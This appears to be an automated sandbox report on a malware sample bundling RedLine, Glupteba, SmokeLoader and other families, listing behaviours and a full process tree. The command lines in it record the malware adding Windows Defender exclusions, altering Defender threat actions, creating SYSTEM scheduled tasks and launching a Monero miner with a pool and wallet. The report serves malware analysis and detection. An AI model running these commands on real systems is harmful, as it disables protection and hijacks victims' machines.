Analysis Overview
SHA256: 5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4
Threat Level: Known bad
The file 17ee93b40d1746f9d99cf8521a2ab566.bin was found to be: Known bad.
Malicious Activity Summary
RedLine
Glupteba payload
Detect Xworm Payload
Xworm
Glupteba
SmokeLoader
RedLine payload
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Stops running service(s)
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Themida packer
Checks BIOS information in registry
Identifies Wine through registry keys
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-14 01:02
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-14 01:02
Reported: 2024-05-14 01:04
Platform: win7-20240221-en
Max time kernel: 26s
Max time network: 154s
Command Line
Signatures
Amadey
Detect Xworm Payload
Glupteba
Glupteba payload
RedLine
RedLine payload
SmokeLoader
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | N/A |
| N/A | N/A | C:\Windows\Temp\127055.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Loads dropped DLL
Themida packer
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe
"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 116
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 52
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 52
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Windows\Temp\127055.exe
"C:\Windows\Temp\127055.exe" --list-devices
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 52
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-359867078-1201342197352886507-1521795268-1586590423-942573878-2093268082-1318655886"
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"
C:\Windows\Temp\728258.exe
"C:\Windows\Temp\728258.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe
"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"
C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe
"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"
C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe
"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"
C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe
"C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe"
C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe
"C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe" /s
C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe
"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"
C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {3A9B6C6B-CA9B-4DC5-A930-AB37A5188810} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe
"C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe"
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\7zS20CA.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe
"C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe
"C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\qEyOWBL.exe\" it /CMsdidNczE 385118 /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe\" it /PdldidFsHw 385118 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\9C20.bat" "
